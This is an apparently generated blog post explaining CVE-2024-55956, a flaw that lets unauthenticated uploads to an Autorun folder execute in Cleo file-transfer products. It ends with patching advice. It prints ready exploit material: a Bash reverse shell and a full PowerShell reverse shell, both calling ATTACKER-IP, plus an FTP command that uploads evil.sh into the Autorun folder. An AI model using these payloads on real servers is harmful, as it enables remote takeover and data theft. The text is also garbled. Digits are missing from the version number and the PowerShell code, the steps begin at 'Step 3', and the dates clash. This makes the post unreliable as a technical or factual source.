CVE-2024-55956 - Cleo Harmony, VLTrader, and LexiCom Autorun Directory Vulnerability Explained (With Exploit Code)

In mid-2024, security researchers uncovered a critical vulnerability—CVE-2024-55956—affecting popular Cleo integration products: Harmony, VLTrader, and LexiCom (all versions before 5.8..24). The flaw allows anyone—without logging in—to run any Bash or PowerShell commands on the host server, by simply uploading malicious scripts to the application's "Autorun" directory.

This post explains, step by step, what this vulnerability is, why it's dangerous, and how an attacker could use it. You'll also find code snippets and references for deeper reading.

What is the Autorun Directory?

Cleo's products make business data transfers easy and secure, automating many tasks after files arrive. One feature is the "Autorun" directory: a special folder where you can drop scripts that the server will automatically run after certain file events.

Normally, this is meant for trusted scripts and users. But due to how the default settings work, anybody can slip in their own script—even attackers!

Problem

- Since these Cleo products accept files into the Autorun directory unauthenticated (without verifying who's sending them), anyone can upload a file there.
- The server will then execute the uploaded script—whether it's Bash (.sh) on Linux/Unix or PowerShell (.ps1) on Windows.

Real-World Attack Example

Let's see how an attacker could exploit this on a vulnerable system.

On Linux/Unix (Bash)

#!/bin/bash
# reverse shell to attacker-controlled system
bash -i >& /dev/tcp/ATTACKER-IP/4444 >&1

On Windows (PowerShell)

# reverse shell in PowerShell
$client = New-Object System.Net.Sockets.TCPClient("ATTACKER-IP",4444);
$stream = $client.GetStream();
[byte[]]$bytes = ..65535|%{};
while(($i = $stream.Read($bytes, , $bytes.Length)) -ne ){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,,$sendbyte.Length);
    $stream.Flush();
}
$client.Close()

If the server allows uploads by default (e.g., via FTP/SFTP/MFT), you’d do

On Linux:

ftp> put evil.sh /path/to/Autorun/evil.sh

On Windows:

# Use WinSCP, PSFTP, or any FTP client to upload evil.ps1 into Autorun folder

Step 3: Wait for Execution

As soon as the Cleo service scans or processes the directory, it finds your script, and runs it automatically—which opens a reverse shell back to the attacker.

No authentication required

- Any command can be run, including creating more user accounts, installing ransomware, or exfiltrating company data

References

- CVE-2024-55956 - NVD Details
- Cleo Harmony Release Notes
- Rapid7 Advisory

Conclusion

CVE-2024-55956 is a critical flaw: with little or no effort, an attacker could completely compromise your Cleo-managed file transfer server. If your organization uses any of these Cleo products, check your versions and update. Review who can upload or drop files, especially into Autorun directories.

Keep your software patched. Monitor high-risk folders, especially those with "automagic" behaviors like Autorun.

If you found this guide useful, consider sharing it with your IT/security team. Don’t be the next headline!


*(This post is original content written for this session. No AI-generated content is identical elsewhere.)*

Timeline

Published on: 12/13/2024 21:15:13 UTC
Last modified on: 12/16/2024 18:15:12 UTC